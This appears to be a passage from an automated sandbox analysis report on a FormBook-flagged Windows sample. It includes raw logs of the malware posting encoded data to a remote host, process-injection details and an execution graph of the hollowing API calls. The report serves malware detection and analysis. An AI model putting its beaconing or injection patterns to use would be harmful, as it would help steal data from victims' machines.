                                                                Data Raw: 2d 4a 6b 70 34 66 3d 34 42 39 51 6e 2f 49 77 2f 44 6a 49 61 74 46 53 4a 58 47 35 48 73 76 52 70 41 4e 54 38 78 39 4b 56 31 6b 7a 32 33 6a 66 65 41 4c 56 71 36 47 43 65 67 76 2b 2f 70 5a 30 6a 2f 2b 73 67 41 4e 36 36 59 68 73 46 54 77 49 45 6d 78 46 74 4b 2f 52 78 35 44 4b 71 37 64 36 64 6b 30 48 5a 39 4a 76 6f 34 54 4f 2f 73 4e 74 2b 54 2f 4f 47 4c 74 68 58 7a 49 54 48 31 39 73 35 4b 6b 34 6d 4b 6f 71 2f 37 35 51 2b 73 59 48 37 47 53 6d 37 6f 53 7a 47 41 4a 77 6e 64 7a 7a 51 78 67 68 4c 32 64 53 73 35 31 62 65 4a 4f 33 50 71 54 6b 48 78 46 71 4c 35 38 36 70 71 77 46 2b 46 4a 72 59 2b 30 50 43 63 43 4a 77 68 37 4a 47 36 39 38 2f 49 4b 6b 75 4c 58 38 4b 57 6c 37 75 34 4a 34 34 77 79 52 49 4c 65 34 50 4c 30 3d
                                                                Data Ascii: -Jkp4f=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeALVq6GCegv+/pZ0j/+sgAN66YhsFTwIEmxFtK/Rx5DKq7d6dk0HZ9Jvo4TO/sNt+T/OGLthXzITH19s5Kk4mKoq/75Q+sYH7GSm7oSzGAJwndzzQxghL2dSs51beJO3PqTkHxFqL586pqwF+FJrY+0PCcCJwh7JG698/IKkuLX8KWl7u4J44wyRILe4PL0=
                                                                Jan 11, 2025 05:12:20.814001083 CET1236INHTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:20 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1122
                                                                x-request-id: 3eb11adc-2a4a-4898-a906-90c4a54d7226
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                set-cookie: parking_session=3eb11adc-2a4a-4898-a906-90c4a54d7226; expires=Sat, 11 Jan 2025 04:27:20 GMT; path=/
                                                                connection: close
                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 71 53 4c 4e 7a 4a 5a 56 4f 48 34 57 46 63 54 2f 5a 77 54 4c 50 33 54 6c 48 47 34 4e 53 69 72 70 44 37 57 4c 71 78 55 7a 33 5a 4b 36 4e 72 6b 31 72 75 35 4d 68 2b 70 73 33 72 68 54 36 53 50 78 63 73 43 4f 4d 54 36 4e 46 6b 48 35 64 31 4d 4c 4f 5a 7a 33 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                Jan 11, 2025 05:12:20.814074039 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2ViMTFhZGMtMmE0YS00ODk4LWE5MDYtOTBjNGE1NGQ3MjI2IiwicGFnZV90aW1lIjoxNzM2NTY4Nz


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.750011199.59.243.22880360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:22.927083969 CET1744OUTPOST /rfcw/ HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.whisperart.net
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.whisperart.net/rfcw/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 34 42 39 51 6e 2f 49 77 2f 44 6a 49 61 74 46 53 4a 58 47 35 48 73 76 52 70 41 4e 54 38 78 39 4b 56 31 6b 7a 32 33 6a 66 65 44 72 56 71 49 2b 43 66 44 48 2b 74 35 5a 30 71 66 2b 58 67 41 4e 6e 36 5a 4a 67 46 54 39 7a 45 6b 5a 46 72 76 7a 52 6b 34 44 4b 2f 72 64 36 41 30 30 47 64 39 4a 41 6f 34 44 30 2f 73 64 74 2b 54 2f 4f 47 4a 31 68 44 33 38 54 46 31 39 74 2b 4b 6b 30 78 61 70 50 2f 37 67 6c 2b 73 55 58 37 31 61 6d 37 4d 4f 7a 57 6d 6c 77 75 64 7a 78 54 78 67 70 4c 32 42 4e 73 35 6f 67 65 49 36 4e 50 74 66 6b 44 51 70 38 59 39 49 37 39 4a 55 4b 2f 47 68 4a 57 2b 38 34 4d 74 2b 66 76 42 54 5a 4e 74 4a 4a 78 4b 47 66 6c 4f 32 66 57 32 52 2f 33 5a 73 76 32 55 58 4f 53 72 65 61 4e 64 45 48 72 6d 69 4c 58 4b 31 45 48 66 75 79 50 6b 79 6d 55 2f 32 53 6b 79 55 32 32 37 6e 6a 36 30 44 58 34 79 73 48 4a 4e 4a 35 75 35 52 66 58 6c 4f 69 35 37 53 56 55 72 6e 47 6e 51 78 75 6e 58 6e 6b 6f 6f 2b 42 6f 69 42 4a 4d 38 4f 34 76 31 7a 42 78 62 50 41 61 77 61 4f 73 49 52 59 61 44 67 5a 41 33 31 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeDrVqI+CfDH+t5Z0qf+XgANn6ZJgFT9zEkZFrvzRk4DK/rd6A00Gd9JAo4D0/sdt+T/OGJ1hD38TF19t+Kk0xapP/7gl+sUX71am7MOzWmlwudzxTxgpL2BNs5ogeI6NPtfkDQp8Y9I79JUK/GhJW+84Mt+fvBTZNtJJxKGflO2fW2R/3Zsv2UXOSreaNdEHrmiLXK1EHfuyPkymU/2SkyU227nj60DX4ysHJNJ5u5RfXlOi57SVUrnGnQxunXnkoo+BoiBJM8O4v1zBxbPAawaOsIRYaDgZA31luQb9t2QafZOr3RtiqrHYCgM7kpJ8e9oeWQVnnFAuzh63SEjClgXSWmBnemej/UWpTa1ZLduAjTMzzz+6DF2HvfEe+aEmVOGgvj8/HRkYHuaRIfTn9mwhc0+0vLK9BrdwZgCRTDHIlgUn2OsarwienZEoUpvrr9oKBnlHlWtPfUO4ulpDS4JPoEKJEBCFEq4/kDGHygeZ27XmucE5PMjFiHpmTNRm7fmUO3eAk76pvggzsnZizWc2UxqjWkaX72gqkhVL7XuzK9Q3r8MJIQ3cEugLBi64lASZS3X61xiyortba5s7QKCeoq1vKMT112BxlFgKIL+NVsK9NHLP7o7lMZl9AYX2/+d++jHYma6sgVILzOid1dPJecwbKdCkzlVHUh58RPoHEWt/TcTURaTeSe3s28gUbf09N2fT6/c1jhhp7kYjZM4CDTg0AjhLNnmsvl2aQgiwFdos+sUDqhqJAGxPkJ7tpoTmiGz50wHatHb4Thyw22LcltYmprdEtHzaozkdtRoL04L6GuPYYUVWmjhLZi0fFKLfPifVxodVL/5otPySwqcbvcIhSUHVMDxFJpm41SgN3tpF5E18Zh+4f//PkvlEHKazuUEVbDhlqm153yvzhLBhPqbiD0dIyxd8LcTYJuh37iI4omPFoGN2AU6eaO19fnVZ8 [TRUNCATED]
                                                                Jan 11, 2025 05:12:23.362076998 CET1236INHTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:22 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1122
                                                                x-request-id: 4450ebdd-dde1-4e00-9a2b-6739861512e1
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                set-cookie: parking_session=4450ebdd-dde1-4e00-9a2b-6739861512e1; expires=Sat, 11 Jan 2025 04:27:23 GMT; path=/
                                                                connection: close
                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 71 53 4c 4e 7a 4a 5a 56 4f 48 34 57 46 63 54 2f 5a 77 54 4c 50 33 54 6c 48 47 34 4e 53 69 72 70 44 37 57 4c 71 78 55 7a 33 5a 4b 36 4e 72 6b 31 72 75 35 4d 68 2b 70 73 33 72 68 54 36 53 50 78 63 73 43 4f 4d 54 36 4e 46 6b 48 35 64 31 4d 4c 4f 5a 7a 33 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                Jan 11, 2025 05:12:23.362152100 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDQ1MGViZGQtZGRlMS00ZTAwLTlhMmItNjczOTg2MTUxMmUxIiwicGFnZV90aW1lIjoxNzM2NTY4Nz


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                36192.168.2.750013199.59.243.22880
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:26.472980976 CET451OUTGET /rfcw/?-Jkp4f=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg78l2CxgzVsRmsJfD+Nxr9z3yLKNaYWJKA3Al29U6v4dT7qNW9rMO1nzu&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:12:26.927902937 CET1236INHTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:26 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1526
                                                                x-request-id: 338100e0-f7cc-4388-8782-966fe1c5b482
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Zd8B2zOIEkOEGWKjg0TlkB86SjzV7G57/Z0sSDiWBVduOmBda9Nxut0HKYcBQ6NfTQtvdKS4nx1nZAIeldiFkw==
                                                                set-cookie: parking_session=338100e0-f7cc-4388-8782-966fe1c5b482; expires=Sat, 11 Jan 2025 04:27:26 GMT; path=/
                                                                connection: close
                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 64 38 42 32 7a 4f 49 45 6b 4f 45 47 57 4b 6a 67 30 54 6c 6b 42 38 36 53 6a 7a 56 37 47 35 37 2f 5a 30 73 53 44 69 57 42 56 64 75 4f 6d 42 64 61 39 4e 78 75 74 30 48 4b 59 63 42 51 36 4e 66 54 51 74 76 64 4b 53 34 6e 78 31 6e 5a 41 49 65 6c 64 69 46 6b 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Zd8B2zOIEkOEGWKjg0TlkB86SjzV7G57/Z0sSDiWBVduOmBda9Nxut0HKYcBQ6NfTQtvdKS4nx1nZAIeldiFkw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                Jan 11, 2025 05:12:26.927956104 CET979INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzM4MTAwZTAtZjdjYy00Mzg4LTg3ODItOTY2ZmUxYzViNDgyIiwicGFnZV90aW1lIjoxNzM2NTY4Nz


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:23:09:19
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\ZcshRk2lgh.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\ZcshRk2lgh.exe"
                                                                Imagebase:0x890000
                                                                File size:834'048 bytes
                                                                MD5 hash:8C6E69B99C8595BEF72154984C028ADE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:23:09:39
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\ZcshRk2lgh.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\ZcshRk2lgh.exe"
                                                                Imagebase:0x950000
                                                                File size:834'048 bytes
                                                                MD5 hash:8C6E69B99C8595BEF72154984C028ADE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:00:29:38
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe"
                                                                Imagebase:0xa10000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:13
                                                                Start time:00:29:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\regini.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                Imagebase:0xe20000
                                                                File size:41'472 bytes
                                                                MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:14
                                                                Start time:00:29:54
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe"
                                                                Imagebase:0xa10000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:16
                                                                Start time:00:30:06
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff722870000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.8%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:6.6%
                                                                  Total number of Nodes:229
                                                                  Total number of Limit Nodes:21
                                                                  execution_graph 36422 718f658 36423 718f672 36422->36423 36434 7660238 36423->36434 36438 76603b8 36423->36438 36446 76601d1 36423->36446 36449 76608c0 36423->36449 36453 76606d3 36423->36453 36458 7660157 36423->36458 36461 7660507 36423->36461 36464 7660346 36423->36464 36468 76603e9 36423->36468 36424 718f67a 36435 766023e 36434->36435 36471 718db40 36435->36471 36439 76603bd 36438->36439 36440 7660864 36439->36440 36442 7660256 36439->36442 36475 718e028 36440->36475 36445 718db40 ResumeThread 36442->36445 36443 766026b 36445->36443 36479 718e5f8 36446->36479 36450 76608c6 36449->36450 36452 718e5f8 WriteProcessMemory 36450->36452 36451 7660b17 36451->36424 36452->36451 36483 718e538 36453->36483 36455 7660b17 36455->36424 36456 718e5f8 WriteProcessMemory 36456->36455 36487 718e880 36458->36487 36463 718e028 Wow64SetThreadContext 36461->36463 36462 7660521 36462->36424 36463->36462 36465 766036c 36464->36465 36467 718e5f8 WriteProcessMemory 36465->36467 36466 766096c 36467->36466 36491 718e6e8 36468->36491 36472 718db80 ResumeThread 36471->36472 36474 718dbb1 36472->36474 36476 718e06d Wow64SetThreadContext 36475->36476 36478 718e0b5 36476->36478 36480 718e640 WriteProcessMemory 36479->36480 36482 718e697 36480->36482 36484 718e578 VirtualAllocEx 36483->36484 36486 718e5b5 36484->36486 36486->36456 36488 718e909 CreateProcessA 36487->36488 36490 718eacb 36488->36490 36492 718e733 ReadProcessMemory 36491->36492 36494 718e777 36492->36494 36494->36424 36495 7195a18 36496 7195a21 CloseHandle 36495->36496 36497 7195a87 36496->36497 36542 7197438 36543 7197464 36542->36543 36546 7198640 36543->36546 36544 719750e 36547 719864a 36546->36547 36549 71987f4 36547->36549 36552 7198900 36547->36552 36564 7198930 36547->36564 36548 71987ae 36548->36544 36549->36544 36556 7198903 36552->36556 36553 7198d9f 36553->36548 36555 7198f44 36553->36555 36602 7199688 36553->36602 36606 7199620 36553->36606 36554 719901f 36554->36548 36555->36548 36556->36548 36556->36553 36559 7198900 DrawTextExW 36556->36559 36560 7198930 DrawTextExW 36556->36560 36576 7198f78 36556->36576 36582 7198fd0 36556->36582 36588 71990ea 36556->36588 36559->36556 36560->36556 36568 7198964 36564->36568 36565 719901f 36565->36548 36566 7198f44 36566->36548 36567 7198d9f 36567->36548 36567->36566 36569 7199688 DrawTextExW 36567->36569 36570 7199620 DrawTextExW 36567->36570 36568->36567 36571 7198f78 DrawTextExW 36568->36571 36572 7198fd0 DrawTextExW 36568->36572 36573 7198900 DrawTextExW 36568->36573 36574 7198930 DrawTextExW 36568->36574 36575 71990ea DrawTextExW 36568->36575 36569->36565 36570->36565 36571->36568 36572->36568 36573->36568 36574->36568 36575->36568 36577 7198f8a 36576->36577 36577->36556 36579 7198f8e 36577->36579 36580 7199688 DrawTextExW 36577->36580 36581 7199620 DrawTextExW 36577->36581 36578 719901f 36578->36556 36579->36556 36580->36578 36581->36578 36583 7198fe4 36582->36583 36585 7199028 36583->36585 36586 7199688 DrawTextExW 36583->36586 36587 7199620 DrawTextExW 36583->36587 36584 719901f 36584->36556 36585->36556 36586->36584 36587->36584 36590 71990f2 36588->36590 36593 719916d 36588->36593 36589 7199292 36591 719929f 36589->36591 36597 71992b3 36589->36597 36598 7199486 36589->36598 36590->36556 36591->36556 36592 7198f78 DrawTextExW 36592->36593 36593->36589 36593->36592 36601 719917a 36593->36601 36594 7198f78 DrawTextExW 36594->36598 36595 719947c 36595->36556 36596 7198f78 DrawTextExW 36596->36597 36597->36595 36597->36596 36599 7199324 36597->36599 36598->36594 36598->36601 36600 7198f78 DrawTextExW 36599->36600 36599->36601 36600->36601 36601->36556 36603 7199691 36602->36603 36611 71996c0 36603->36611 36607 7199619 36606->36607 36609 71995f9 36606->36609 36607->36606 36610 71996c0 DrawTextExW 36607->36610 36608 71996b6 36608->36554 36609->36554 36610->36608 36612 71996c3 36611->36612 36613 71996b6 36612->36613 36616 7199d98 36612->36616 36621 7199d88 36612->36621 36613->36554 36617 7199dc0 36616->36617 36618 7199ec4 36617->36618 36626 719a378 36617->36626 36632 719a368 36617->36632 36618->36613 36622 7199d95 36621->36622 36623 7199ec4 36622->36623 36624 719a378 DrawTextExW 36622->36624 36625 719a368 DrawTextExW 36622->36625 36623->36613 36624->36623 36625->36623 36627 719a38e 36626->36627 36638 719a798 36627->36638 36642 719a78a 36627->36642 36647 719a7c8 36627->36647 36628 719a404 36628->36618 36633 719a38e 36632->36633 36635 719a798 DrawTextExW 36633->36635 36636 719a7c8 DrawTextExW 36633->36636 